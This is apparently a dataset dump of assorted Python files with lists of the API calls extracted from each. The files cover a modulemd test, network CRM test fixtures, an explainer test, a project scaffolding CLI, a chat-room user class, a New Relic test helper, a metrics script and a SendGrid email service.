obsoletes_with_context + obsoletes_without_context,
]:
idx = ModuleIndex.new()
stream = Modulemd.ModuleStream.new(2, "nodejs", "10")
stream.props.context = "deadbeef"
res = idx.add_module_stream(stream)
res, failures = idx.update_from_string(ordered_yaml, True)
m = idx.get_module("nodejs")
streams = m.get_all_streams()
s = streams[0]
assert (
s.get_obsoletes_resolved().get_obsoleted_by_module_stream()
== "14"
)
if __name__ == "__main__":
unittest.main()
| [
"gi.repository.Modulemd.Obsoletes.new",
"os.path.join",
"gi.require_version",
"gi.repository.Modulemd.ModuleIndex.new",
"gi.repository.Modulemd.ModuleStream.new",
"sys.exit",
"unittest.main"
] | [((454, 491), 'gi.require_version', 'gi.require_version', (['"""Modulemd"""', '"""2.0"""'], {}), "('Modulemd', '2.0')\n", (472, 491), False, 'import gi\n'), ((3275, 3290), 'unittest.main', 'unittest.main', ([], {}), '()\n', (3288, 3290), False, 'import unittest\n'), ((737, 749), 'sys.exit', 'sys.exit', (['(77)'], {}), '(77)\n', (745, 749), False, 'import sys\n'), ((856, 882), 'gi.repository.Modulemd.ModuleIndex.new', 'Modulemd.ModuleIndex.new', ([], {}), '()\n', (880, 882), False, 'from gi.repository import Modulemd\n'), ((1189, 1215), 'gi.repository.Modulemd.ModuleIndex.new', 'Modulemd.ModuleIndex.new', ([], {}), '()\n', (1213, 1215), False, 'from gi.repository import Modulemd\n'), ((1228, 1295), 'gi.repository.Modulemd.Obsoletes.new', 'Modulemd.Obsoletes.new', (['(1)', '(2)', '"""testmodule"""', '"""teststream"""', '"""testmsg"""'], {}), "(1, 2, 'testmodule', 'teststream', 'testmsg')\n", (1250, 1295), False, 'from gi.repository import Modulemd\n'), ((912, 954), 'os.path.join', 'path.join', (['self.test_data_path', '"""f29.yaml"""'], {}), "(self.test_data_path, 'f29.yaml')\n", (921, 954), False, 'from os import path\n'), ((2748, 2765), 'gi.repository.Modulemd.ModuleIndex.new', 'ModuleIndex.new', ([], {}), '()\n', (2763, 2765), False, 'from gi.repository.Modulemd import ModuleIndex\n'), ((2787, 2831), 'gi.repository.Modulemd.ModuleStream.new', 'Modulemd.ModuleStream.new', (['(2)', '"""nodejs"""', '"""10"""'], {}), "(2, 'nodejs', '10')\n", (2812, 2831), False, 'from gi.repository import Modulemd\n')] |
import logging
import pytest
from tests.common.utilities import wait_until
from utils import get_crm_resources, check_queue_status, sleep_to_wait
CRM_POLLING_INTERVAL = 1
CRM_DEFAULT_POLL_INTERVAL = 300
MAX_WAIT_TIME = 120
logger = logging.getLogger(__name__)
@pytest.fixture(scope='module')
def get_function_conpleteness_level(pytestconfig):
return pytestconfig.getoption("--completeness_level")
@pytest.fixture(scope="module", autouse=True)
def set_polling_interval(duthost):
wait_time = 2
duthost.command("crm config polling interval {}".format(CRM_POLLING_INTERVAL))
logger.info("Waiting {} sec for CRM counters to become updated".format(wait_time))
time.sleep(wait_time)
yield
duthost.command("crm config polling interval {}".format(CRM_DEFAULT_POLL_INTERVAL))
logger.info("Waiting {} sec for CRM counters to become updated".format(wait_time))
time.sleep(wait_time)
@pytest.fixture(scope='module')
def withdraw_and_announce_existing_routes(duthost, localhost, tbinfo):
ptf_ip = tbinfo["ptf_ip"]
topo_name = tbinfo["topo"]["name"]
logger.info("withdraw existing ipv4 and ipv6 routes")
localhost.announce_routes(topo_name=topo_name, ptf_ip=ptf_ip, action="withdraw", path="../ansible/")
wait_until(MAX_WAIT_TIME, CRM_POLLING_INTERVAL, 0, lambda: check_queue_status(duthost, "inq") == True)
sleep_to_wait(CRM_POLLING_INTERVAL * 100)
ipv4_route_used_before = get_crm_resources(duthost, "ipv4_route", "used")
ipv6_route_used_before = get_crm_resources(duthost, "ipv6_route", "used")
logger.info("ipv4 route used {}".format(ipv4_route_used_before))
logger.info("ipv6 route used {}".format(ipv6_route_used_before))
yield ipv4_route_used_before, ipv6_route_used_before
logger.info("announce existing ipv4 and ipv6 routes")
localhost.announce_routes(topo_name=topo_name, ptf_ip=ptf_ip, action="announce", path="../ansible/")
wait_until(MAX_WAIT_TIME, CRM_POLLING_INTERVAL, 0, lambda: check_queue_status(duthost, "outq") == True)
sleep_to_wait(CRM_POLLING_INTERVAL * 5)
logger.info("ipv4 route used {}".format(get_crm_resources(duthost, "ipv4_route", "used")))
logger.info("ipv6 route used {}".format(get_crm_resources(duthost, "ipv6_route", "used")))
| [
"logging.getLogger",
"utils.check_queue_status",
"utils.get_crm_resources",
"utils.sleep_to_wait",
"pytest.fixture"
] | [((235, 262), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (252, 262), False, 'import logging\n'), ((266, 296), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (280, 296), False, 'import pytest\n'), ((409, 453), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""', 'autouse': '(True)'}), "(scope='module', autouse=True)\n", (423, 453), False, 'import pytest\n'), ((919, 949), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (933, 949), False, 'import pytest\n'), ((1366, 1407), 'utils.sleep_to_wait', 'sleep_to_wait', (['(CRM_POLLING_INTERVAL * 100)'], {}), '(CRM_POLLING_INTERVAL * 100)\n', (1379, 1407), False, 'from utils import get_crm_resources, check_queue_status, sleep_to_wait\n'), ((1437, 1485), 'utils.get_crm_resources', 'get_crm_resources', (['duthost', '"""ipv4_route"""', '"""used"""'], {}), "(duthost, 'ipv4_route', 'used')\n", (1454, 1485), False, 'from utils import get_crm_resources, check_queue_status, sleep_to_wait\n'), ((1515, 1563), 'utils.get_crm_resources', 'get_crm_resources', (['duthost', '"""ipv6_route"""', '"""used"""'], {}), "(duthost, 'ipv6_route', 'used')\n", (1532, 1563), False, 'from utils import get_crm_resources, check_queue_status, sleep_to_wait\n'), ((2037, 2076), 'utils.sleep_to_wait', 'sleep_to_wait', (['(CRM_POLLING_INTERVAL * 5)'], {}), '(CRM_POLLING_INTERVAL * 5)\n', (2050, 2076), False, 'from utils import get_crm_resources, check_queue_status, sleep_to_wait\n'), ((2121, 2169), 'utils.get_crm_resources', 'get_crm_resources', (['duthost', '"""ipv4_route"""', '"""used"""'], {}), "(duthost, 'ipv4_route', 'used')\n", (2138, 2169), False, 'from utils import get_crm_resources, check_queue_status, sleep_to_wait\n'), ((2216, 2264), 'utils.get_crm_resources', 'get_crm_resources', (['duthost', '"""ipv6_route"""', '"""used"""'], {}), "(duthost, 'ipv6_route', 'used')\n", (2233, 2264), False, 'from utils import get_crm_resources, check_queue_status, sleep_to_wait\n'), ((1318, 1352), 'utils.check_queue_status', 'check_queue_status', (['duthost', '"""inq"""'], {}), "(duthost, 'inq')\n", (1336, 1352), False, 'from utils import get_crm_resources, check_queue_status, sleep_to_wait\n'), ((1988, 2023), 'utils.check_queue_status', 'check_queue_status', (['duthost', '"""outq"""'], {}), "(duthost, 'outq')\n", (2006, 2023), False, 'from utils import get_crm_resources, check_queue_status, sleep_to_wait\n')] |
# ---------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# ---------------------------------------------------------
# Tests for classical explainer
from interpret_text.experimental.classical import ClassicalTextExplainer
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
from utils_test import get_mnli_test_dataset
DOCUMENT = "rare bird has more than enough charm to make it memorable."
class TestClassicalExplainer(object):
def test_working(self):
assert True
def test_explain_model_local(self):
"""
Test for explain_local of classical explainer
:return:
"""
train_df = get_mnli_test_dataset('train')
X_str = train_df['sentence1']
ylabels = train_df['genre']
X_train, X_test, y_train, y_test = train_test_split(X_str, ylabels, train_size=0.8, test_size=0.2)
label_encoder = LabelEncoder()
y_train = label_encoder.fit_transform(y_train)
explainer = ClassicalTextExplainer()
classifier, best_params = explainer.fit(X_train, y_train)
explainer.preprocessor.labelEncoder = label_encoder
local_explanantion = explainer.explain_local(DOCUMENT)
assert len(local_explanantion.local_importance_values) == len(local_explanantion.features)
| [
"sklearn.model_selection.train_test_split",
"utils_test.get_mnli_test_dataset",
"sklearn.preprocessing.LabelEncoder",
"interpret_text.experimental.classical.ClassicalTextExplainer"
] | [((747, 777), 'utils_test.get_mnli_test_dataset', 'get_mnli_test_dataset', (['"""train"""'], {}), "('train')\n", (768, 777), False, 'from utils_test import get_mnli_test_dataset\n'), ((895, 958), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X_str', 'ylabels'], {'train_size': '(0.8)', 'test_size': '(0.2)'}), '(X_str, ylabels, train_size=0.8, test_size=0.2)\n', (911, 958), False, 'from sklearn.model_selection import train_test_split\n'), ((984, 998), 'sklearn.preprocessing.LabelEncoder', 'LabelEncoder', ([], {}), '()\n', (996, 998), False, 'from sklearn.preprocessing import LabelEncoder\n'), ((1074, 1098), 'interpret_text.experimental.classical.ClassicalTextExplainer', 'ClassicalTextExplainer', ([], {}), '()\n', (1096, 1098), False, 'from interpret_text.experimental.classical import ClassicalTextExplainer\n')] |
import argparse
from create_python_app.path_utils import *
from create_python_app.create_gitignore_file import create_gitignore_file
from create_python_app.create_license_file import create_license_file
from create_python_app.create_makefile_file import create_makefile_file
from create_python_app.create_readme_file import create_readme_file
from create_python_app.create_requirements_file import create_requirements_file
from create_python_app.create_setup_file import create_setup_file
from create_python_app.create_root_package import create_root_package
from create_python_app.create_config_files import create_config_files
from create_python_app.create_config_module import create_config_module
def _parse():
parser = argparse.ArgumentParser()
parser.add_argument("--name", required=True, type=str)
args = parser.parse_args()
return args.name
def main():
app_name = _parse()
base_dir = create_dir(os.getcwd(), app_name)
create_gitignore_file(base_dir)
create_license_file(base_dir)
create_makefile_file(base_dir, app_name=app_name)
create_readme_file(base_dir, app_name=app_name)
create_requirements_file(base_dir)
create_setup_file(base_dir)
create_root_package(base_dir, app_name=app_name)
create_config_files(base_dir)
create_config_module(base_dir, app_name=app_name)
if __name__ == '__main__':
main() | [
"create_python_app.create_readme_file.create_readme_file",
"argparse.ArgumentParser",
"create_python_app.create_config_module.create_config_module",
"create_python_app.create_root_package.create_root_package",
"create_python_app.create_setup_file.create_setup_file",
"create_python_app.create_gitignore_fil... | [((729, 754), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (752, 754), False, 'import argparse\n'), ((956, 987), 'create_python_app.create_gitignore_file.create_gitignore_file', 'create_gitignore_file', (['base_dir'], {}), '(base_dir)\n', (977, 987), False, 'from create_python_app.create_gitignore_file import create_gitignore_file\n'), ((992, 1021), 'create_python_app.create_license_file.create_license_file', 'create_license_file', (['base_dir'], {}), '(base_dir)\n', (1011, 1021), False, 'from create_python_app.create_license_file import create_license_file\n'), ((1026, 1075), 'create_python_app.create_makefile_file.create_makefile_file', 'create_makefile_file', (['base_dir'], {'app_name': 'app_name'}), '(base_dir, app_name=app_name)\n', (1046, 1075), False, 'from create_python_app.create_makefile_file import create_makefile_file\n'), ((1080, 1127), 'create_python_app.create_readme_file.create_readme_file', 'create_readme_file', (['base_dir'], {'app_name': 'app_name'}), '(base_dir, app_name=app_name)\n', (1098, 1127), False, 'from create_python_app.create_readme_file import create_readme_file\n'), ((1132, 1166), 'create_python_app.create_requirements_file.create_requirements_file', 'create_requirements_file', (['base_dir'], {}), '(base_dir)\n', (1156, 1166), False, 'from create_python_app.create_requirements_file import create_requirements_file\n'), ((1171, 1198), 'create_python_app.create_setup_file.create_setup_file', 'create_setup_file', (['base_dir'], {}), '(base_dir)\n', (1188, 1198), False, 'from create_python_app.create_setup_file import create_setup_file\n'), ((1203, 1251), 'create_python_app.create_root_package.create_root_package', 'create_root_package', (['base_dir'], {'app_name': 'app_name'}), '(base_dir, app_name=app_name)\n', (1222, 1251), False, 'from create_python_app.create_root_package import create_root_package\n'), ((1256, 1285), 'create_python_app.create_config_files.create_config_files', 'create_config_files', (['base_dir'], {}), '(base_dir)\n', (1275, 1285), False, 'from create_python_app.create_config_files import create_config_files\n'), ((1290, 1339), 'create_python_app.create_config_module.create_config_module', 'create_config_module', (['base_dir'], {'app_name': 'app_name'}), '(base_dir, app_name=app_name)\n', (1310, 1339), False, 'from create_python_app.create_config_module import create_config_module\n')] |
import time
class User:
"""
A class representing a users information.
NOTE: Defaults are attributes that pinylib expects
"""
def __init__(self, **kwargs):
# Default's.
self.lf = kwargs.get('lf')
self.account = kwargs.get('account', '')
self.is_owner = kwargs.get('own', False)
self.gp = kwargs.get('gp', 0)
self.alevel = kwargs.get('alevel', '')
self.bf = kwargs.get('bf', False)
self.nick = kwargs.get('nick')
self.btype = kwargs.get('btype', '')
self.id = kwargs.get('id', -1)
self.stype = kwargs.get('stype', 0)
self.is_mod = kwargs.get('mod', False)
self.join_time = time.time()
self.tinychat_id = None
self.last_login = None
self.user_level = 0
# Extras.
self.last_msg = None
self.screened = False
class Users:
"""
This class represents the users in the room.
Each user name is a dict key where the value of the key is represented by the User class.
It contains methods to do various user based operations with.
"""
def __init__(self):
# Create a dictionary to store each user key value in.
self._users = dict()
@property
def all(self):
"""
All the users in the room.
:return: dict key value (User)
"""
return self._users
@property
def mods(self):
"""
All the moderators in the room.
:return: list all of the moderators objects (User) in the room.
"""
_mods = []
for user in self.all:
if self.all[user].is_mod:
_mods.append(self.all[user])
return _mods
@property
def signed_in(self):
"""
All users in the room using an account.
:return: list all the signed in users objects (user) in the room.
"""
_signed_ins = []
for user in self.all:
if self.all[user].account:
_signed_ins.append(self.all[user])
return _signed_ins
@property
def nli(self):
nlis = []
for user in self.all:
if not self.all[user].account:
nlis.append(self.all[user])
return nlis
@property
def lurkers(self):
"""
All the lurkers in the room.
:return: list of all the lurker objects (User) in the room.
"""
_lurkers = []
for user in self.all:
if self.all[user].lf:
_lurkers.append(self.all[user])
return _lurkers
@property
def norms(self):
"""
All the normal users in the room.
e.g users that are not moderators or lurkers.
:return: list of all the normal users objects (User) in the room.
"""
_regs = []
for user in self.all:
if not self.all[user].is_mod and not self.all[user].lf:
_regs.append(self.all[user])
return _regs
def clear(self):
""" Delete all the users. """
self._users.clear()
def add(self, user_info):
"""
Add a user to the users dict.
:param user_info dict, tinychat user info.
:return user info object (User)
"""
if user_info['nick'] not in self.all:
self._users[user_info['nick']] = User(**user_info)
return self.all[user_info['nick']]
def change(self, old_nick, new_nick, user_info):
"""
Change a user nickname.
:param old_nick: str the user's old nickname.
:param new_nick: str the user's new nickname.
:param user_info: object, the user's user info (User)
:return: True if changed, else False.
"""
if self.delete(old_nick):
if new_nick not in self.all:
self._users[new_nick] = user_info
return True
return False
return False
def delete(self, user_name):
"""
Delete a user from the Users class.
:param user_name: str the user to delete.
:return: True if deleted, else False.
"""
if user_name in self.all:
del self._users[user_name]
return True
return False
def search(self, user_name):
"""
Search the Users class by nick name for a user.
:param user_name: str the user to find.
:return: if user name is found, object (User) else None
"""
if user_name in self.all:
return self.all[user_name]
return None
# TODO: Issue with search by id, if the user is not found the in the dictionary on the first pass through the
# loop then it will by default return None.
def search_by_id(self, user_id):
"""
Search for a user by id.
:param user_id: str the users ID
:return if user id is found, object (User) else None
"""
for user in self.all:
#print(user)
if str(self.all[user].id) == user_id:
return self.all[user]
return None
| [
"time.time"
] | [((697, 708), 'time.time', 'time.time', ([], {}), '()\n', (706, 708), False, 'import time\n')] |
# Copyright 2010 New Relic, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from newrelic.common.encoding_utils import (serverless_payload_decode,
json_decode)
from newrelic.common.object_wrapper import (
transient_function_wrapper,
function_wrapper)
def validate_serverless_payload(count=1):
@function_wrapper
def _validate_wrapper(wrapped, instance, args, kwargs):
payloads = []
@transient_function_wrapper('newrelic.core.data_collector',
'ServerlessModeSession.finalize')
def _capture(wrapped, instance, args, kwargs):
payload = wrapped(*args, **kwargs)
payloads.append(payload)
return payload
def _validate():
assert len(payloads) == count
for payload in payloads:
assert isinstance(payload, str)
obj = json_decode(payload)
assert len(obj) == 3, obj
assert obj[0] == 1 # Version = 1
assert obj[1] == 'NR_LAMBDA_MONITORING' # Marker
decoded = serverless_payload_decode(obj[2])
# Keys should only contain metadata / data
set(decoded.keys()) == set(('metadata', 'data'))
capture_wrapped = _capture(wrapped)
result = capture_wrapped(*args, **kwargs)
_validate()
return result
return _validate_wrapper
| [
"newrelic.common.object_wrapper.transient_function_wrapper",
"newrelic.common.encoding_utils.json_decode",
"newrelic.common.encoding_utils.serverless_payload_decode"
] | [((939, 1035), 'newrelic.common.object_wrapper.transient_function_wrapper', 'transient_function_wrapper', (['"""newrelic.core.data_collector"""', '"""ServerlessModeSession.finalize"""'], {}), "('newrelic.core.data_collector',\n 'ServerlessModeSession.finalize')\n", (965, 1035), False, 'from newrelic.common.object_wrapper import transient_function_wrapper, function_wrapper\n'), ((1391, 1411), 'newrelic.common.encoding_utils.json_decode', 'json_decode', (['payload'], {}), '(payload)\n', (1402, 1411), False, 'from newrelic.common.encoding_utils import serverless_payload_decode, json_decode\n'), ((1599, 1632), 'newrelic.common.encoding_utils.serverless_payload_decode', 'serverless_payload_decode', (['obj[2]'], {}), '(obj[2])\n', (1624, 1632), False, 'from newrelic.common.encoding_utils import serverless_payload_decode, json_decode\n')] |
import argparse
import logging
from pathlib import Path
import dask
import h5py
import joblib
import numpy as np
import pandas as pd
from dask.diagnostics import ProgressBar
from tqdm import tqdm
from dsconcept.get_metrics import (
get_cat_inds,
get_synth_preds,
load_category_models,
load_concept_models,
HierarchicalClassifier,
get_mets,
)
logging.basicConfig(level=logging.INFO)
LOG = logging.getLogger(__name__)
LOG.setLevel(logging.INFO)
def main(
experiment_name,
synth_strat,
in_cat_preds,
out_store,
synth_batch_size,
t,
out_synth_scores,
limit=None,
con_limit=None,
):
test_inds = np.load(f"data/interim/{experiment_name}/test_inds.npy")
feature_matrix = joblib.load(f"data/interim/{experiment_name}/feature_matrix.jbl")
in_cat_models = Path(f"models/{experiment_name}/categories/models/")
in_kwd_models = Path(f"models/{experiment_name}/keywords/models/")
cat_preds = np.load(in_cat_preds) # based on experiment or explicit path?
cat_clfs = load_category_models(in_cat_models)
cd = load_concept_models(in_kwd_models)
clf = HierarchicalClassifier(cat_clfs, cd)
if limit is not None:
LOG.info(f"Limiting to {limit} test records.")
feature_matrix_test = feature_matrix.tocsc()[test_inds[0:limit], :]
cat_preds = cat_preds[0:limit, :]
# TODO: How does this affect indices?
else:
feature_matrix_test = feature_matrix.tocsc()[test_inds, :]
LOG.info(f'Synthesizing predictions with strategy "{synth_strat}".')
all_cat_inds = get_cat_inds(clf.categories, cat_preds, t=t)
if con_limit is not None:
conwc = clf.concepts_with_classifiers[0:con_limit]
else:
conwc = clf.concepts_with_classifiers
shape = (feature_matrix_test.shape[0], len(conwc))
with tqdm(total=shape[0]) as pbar:
get_synth_preds(
out_store,
shape,
all_cat_inds,
clf.categories,
synth_batch_size,
only_cat=False,
synth_strat=synth_strat,
con_limit=con_limit,
limit=limit,
pbar=pbar,
)
LOG.info("Obtaining metrics.")
with h5py.File(out_store, "r") as f0:
if limit is not None:
target_values = f0["ground_truth"][0:limit, :]
else:
target_values = f0["ground_truth"].value
with h5py.File(out_store, "r") as f0:
synth_preds = f0["synthesis"].value
jobs = []
mets_pbar = tqdm(
range(len(conwc)),
total=len(conwc),
)
for i in mets_pbar:
job = dask.delayed(get_mets)(
i, synth_preds, target_values, conwc, mets_pbar
)
jobs.append(job)
records = dask.compute(jobs)
new_recs_df = pd.DataFrame(records[0])
LOG.info(f"Saving results to {out_synth_scores}.")
new_recs_df.to_csv(out_synth_scores)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Say hello")
parser.add_argument("--experiment_name", help="input txt file")
parser.add_argument("--synth_strat", help="input txt file")
parser.add_argument("--in_cat_preds", help="input txt file")
parser.add_argument("--store", help="input txt file")
parser.add_argument("--synth_batch_size", help="input txt file", type=int)
parser.add_argument("--threshold", help="input txt file", type=float)
parser.add_argument("--out_synth_scores", help="input txt file")
parser.add_argument(
"--limit", help="size for sample to test synthesis", type=int, default=None
)
parser.add_argument(
"--con_limit", help="size for concept sample", type=int, default=None
)
args = parser.parse_args()
main(
args.experiment_name,
args.synth_strat,
args.in_cat_preds,
args.store,
args.synth_batch_size,
args.threshold,
args.out_synth_scores,
args.limit,
args.con_limit,
)
| [
"logging.basicConfig",
"logging.getLogger",
"dsconcept.get_metrics.get_synth_preds",
"dask.delayed",
"dask.compute",
"pathlib.Path",
"argparse.ArgumentParser",
"dsconcept.get_metrics.get_cat_inds",
"dsconcept.get_metrics.load_concept_models",
"tqdm.tqdm",
"h5py.File",
"dsconcept.get_metrics.lo... | [((369, 408), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO'}), '(level=logging.INFO)\n', (388, 408), False, 'import logging\n'), ((415, 442), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (432, 442), False, 'import logging\n'), ((659, 715), 'numpy.load', 'np.load', (['f"""data/interim/{experiment_name}/test_inds.npy"""'], {}), "(f'data/interim/{experiment_name}/test_inds.npy')\n", (666, 715), True, 'import numpy as np\n'), ((737, 802), 'joblib.load', 'joblib.load', (['f"""data/interim/{experiment_name}/feature_matrix.jbl"""'], {}), "(f'data/interim/{experiment_name}/feature_matrix.jbl')\n", (748, 802), False, 'import joblib\n'), ((823, 875), 'pathlib.Path', 'Path', (['f"""models/{experiment_name}/categories/models/"""'], {}), "(f'models/{experiment_name}/categories/models/')\n", (827, 875), False, 'from pathlib import Path\n'), ((896, 946), 'pathlib.Path', 'Path', (['f"""models/{experiment_name}/keywords/models/"""'], {}), "(f'models/{experiment_name}/keywords/models/')\n", (900, 946), False, 'from pathlib import Path\n'), ((963, 984), 'numpy.load', 'np.load', (['in_cat_preds'], {}), '(in_cat_preds)\n', (970, 984), True, 'import numpy as np\n'), ((1041, 1076), 'dsconcept.get_metrics.load_category_models', 'load_category_models', (['in_cat_models'], {}), '(in_cat_models)\n', (1061, 1076), False, 'from dsconcept.get_metrics import get_cat_inds, get_synth_preds, load_category_models, load_concept_models, HierarchicalClassifier, get_mets\n'), ((1086, 1120), 'dsconcept.get_metrics.load_concept_models', 'load_concept_models', (['in_kwd_models'], {}), '(in_kwd_models)\n', (1105, 1120), False, 'from dsconcept.get_metrics import get_cat_inds, get_synth_preds, load_category_models, load_concept_models, HierarchicalClassifier, get_mets\n'), ((1131, 1167), 'dsconcept.get_metrics.HierarchicalClassifier', 'HierarchicalClassifier', (['cat_clfs', 'cd'], {}), '(cat_clfs, cd)\n', (1153, 1167), False, 'from dsconcept.get_metrics import get_cat_inds, get_synth_preds, load_category_models, load_concept_models, HierarchicalClassifier, get_mets\n'), ((1584, 1628), 'dsconcept.get_metrics.get_cat_inds', 'get_cat_inds', (['clf.categories', 'cat_preds'], {'t': 't'}), '(clf.categories, cat_preds, t=t)\n', (1596, 1628), False, 'from dsconcept.get_metrics import get_cat_inds, get_synth_preds, load_category_models, load_concept_models, HierarchicalClassifier, get_mets\n'), ((2762, 2780), 'dask.compute', 'dask.compute', (['jobs'], {}), '(jobs)\n', (2774, 2780), False, 'import dask\n'), ((2799, 2823), 'pandas.DataFrame', 'pd.DataFrame', (['records[0]'], {}), '(records[0])\n', (2811, 2823), True, 'import pandas as pd\n'), ((2962, 3010), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Say hello"""'}), "(description='Say hello')\n", (2985, 3010), False, 'import argparse\n'), ((1838, 1858), 'tqdm.tqdm', 'tqdm', ([], {'total': 'shape[0]'}), '(total=shape[0])\n', (1842, 1858), False, 'from tqdm import tqdm\n'), ((1876, 2052), 'dsconcept.get_metrics.get_synth_preds', 'get_synth_preds', (['out_store', 'shape', 'all_cat_inds', 'clf.categories', 'synth_batch_size'], {'only_cat': '(False)', 'synth_strat': 'synth_strat', 'con_limit': 'con_limit', 'limit': 'limit', 'pbar': 'pbar'}), '(out_store, shape, all_cat_inds, clf.categories,\n synth_batch_size, only_cat=False, synth_strat=synth_strat, con_limit=\n con_limit, limit=limit, pbar=pbar)\n', (1891, 2052), False, 'from dsconcept.get_metrics import get_cat_inds, get_synth_preds, load_category_models, load_concept_models, HierarchicalClassifier, get_mets\n'), ((2220, 2245), 'h5py.File', 'h5py.File', (['out_store', '"""r"""'], {}), "(out_store, 'r')\n", (2229, 2245), False, 'import h5py\n'), ((2418, 2443), 'h5py.File', 'h5py.File', (['out_store', '"""r"""'], {}), "(out_store, 'r')\n", (2427, 2443), False, 'import h5py\n'), ((2629, 2651), 'dask.delayed', 'dask.delayed', (['get_mets'], {}), '(get_mets)\n', (2641, 2651), False, 'import dask\n')] |
"""Email module"""
#pylint: disable=too-few-public-methods
import json
import os
import falcon
import requests
from mako.template import Template
import sendgrid
from sendgrid.helpers.mail import Email, To, Content, Mail
from .hooks import validate_access
FROM_EMAIL = "<EMAIL>"
SUBJECT = "Appointment Offering"
SPREADSHEETS_MICROSERVICE_URL = os.environ.get("SPREADSHEETS_MICROSERVICE_URL")
SPREADSHEETS_MICROSERVICE_API_KEY = os.environ.get("SPREADSHEETS_MICROSERVICE_API_KEY")
SPREADSHEET_KEY = os.environ.get("SPREADSHEET_KEY")
SPREADSHEETS_ID_COL = "A"
SPREADSHEETS_RESPONSE_COL = "AL"
SITE_DOMAIN = os.environ.get("SITE_DOMAIN")
SENDGRID_API_KEY = os.environ.get('SENDGRID_API_KEY')
@falcon.before(validate_access)
class EmailOffer():
"""EmailOffer class"""
def on_post(self, _req, resp):
#pylint: disable=no-self-use
"""
Send email to offer a new appointment
"""
request_body = _req.bounded_stream.read()
request_params_json = json.loads(request_body)
template = Template(filename="templates/appointment_offer.html")
sg = sendgrid.SendGridAPIClient(api_key=SENDGRID_API_KEY) #pylint: disable=invalid-name
from_email = Email(FROM_EMAIL)
to_email = To(request_params_json.get("to"))
content = Content("text/html", template.render(
site=SITE_DOMAIN,
id=request_params_json.get('id'),
name=request_params_json.get('name'),
newDate=request_params_json.get('newDate'),
newTime=request_params_json.get('newTime'),
oldDate=request_params_json.get('oldDate'),
oldTime=request_params_json.get('oldTime')
))
mail = Mail(from_email, to_email, SUBJECT, content)
response = sg.client.mail.send.post(request_body=mail.get())
print(response.status_code)
print(response.body)
print(response.headers)
resp.body = response.body
resp.status_code = falcon.HTTP_200
class OfferResponse():
"""record applicant response to the offer"""
def on_get(self, _req, resp):
#pyint: disable=no-self-use
"""
write the response to google sheet
"""
try:
data = create_spreadsheets_json()
data["label_value_map"] = {
SPREADSHEETS_RESPONSE_COL: _req.params.get('action')
}
print(data)
response = requests.patch(
url='{0}/rows/{1}'.format(SPREADSHEETS_MICROSERVICE_URL, _req.params.get('id')),
headers=get_request_headers(),
json=data
)
response.raise_for_status()
resp.content_type = falcon.MEDIA_HTML
template = Template(filename='templates/email_response.html')
resp.body = template.render()
resp.status = falcon.HTTP_200
except requests.HTTPError as err:
print("HTTPError:")
print("{0} {1}".format(err.response.status_code, err.response.text))
resp.status = falcon.get_http_status(err.response.status_code)
resp.body = json.dumps(err.response.json())
def get_request_headers():
"""
headers for request to spreadsheets microservice
"""
return {
'x-apikey': SPREADSHEETS_MICROSERVICE_API_KEY
}
def create_spreadsheets_json():
return {
"spreadsheet_key": SPREADSHEET_KEY,
"worksheet_title": "Sheet1",
"id_column_label": SPREADSHEETS_ID_COL,
} | [
"json.loads",
"sendgrid.helpers.mail.Email",
"mako.template.Template",
"sendgrid.helpers.mail.Mail",
"falcon.get_http_status",
"sendgrid.SendGridAPIClient",
"os.environ.get",
"falcon.before"
] | [((345, 392), 'os.environ.get', 'os.environ.get', (['"""SPREADSHEETS_MICROSERVICE_URL"""'], {}), "('SPREADSHEETS_MICROSERVICE_URL')\n", (359, 392), False, 'import os\n'), ((429, 480), 'os.environ.get', 'os.environ.get', (['"""SPREADSHEETS_MICROSERVICE_API_KEY"""'], {}), "('SPREADSHEETS_MICROSERVICE_API_KEY')\n", (443, 480), False, 'import os\n'), ((499, 532), 'os.environ.get', 'os.environ.get', (['"""SPREADSHEET_KEY"""'], {}), "('SPREADSHEET_KEY')\n", (513, 532), False, 'import os\n'), ((606, 635), 'os.environ.get', 'os.environ.get', (['"""SITE_DOMAIN"""'], {}), "('SITE_DOMAIN')\n", (620, 635), False, 'import os\n'), ((655, 689), 'os.environ.get', 'os.environ.get', (['"""SENDGRID_API_KEY"""'], {}), "('SENDGRID_API_KEY')\n", (669, 689), False, 'import os\n'), ((692, 722), 'falcon.before', 'falcon.before', (['validate_access'], {}), '(validate_access)\n', (705, 722), False, 'import falcon\n'), ((996, 1020), 'json.loads', 'json.loads', (['request_body'], {}), '(request_body)\n', (1006, 1020), False, 'import json\n'), ((1040, 1093), 'mako.template.Template', 'Template', ([], {'filename': '"""templates/appointment_offer.html"""'}), "(filename='templates/appointment_offer.html')\n", (1048, 1093), False, 'from mako.template import Template\n'), ((1108, 1160), 'sendgrid.SendGridAPIClient', 'sendgrid.SendGridAPIClient', ([], {'api_key': 'SENDGRID_API_KEY'}), '(api_key=SENDGRID_API_KEY)\n', (1134, 1160), False, 'import sendgrid\n'), ((1212, 1229), 'sendgrid.helpers.mail.Email', 'Email', (['FROM_EMAIL'], {}), '(FROM_EMAIL)\n', (1217, 1229), False, 'from sendgrid.helpers.mail import Email, To, Content, Mail\n'), ((1714, 1758), 'sendgrid.helpers.mail.Mail', 'Mail', (['from_email', 'to_email', 'SUBJECT', 'content'], {}), '(from_email, to_email, SUBJECT, content)\n', (1718, 1758), False, 'from sendgrid.helpers.mail import Email, 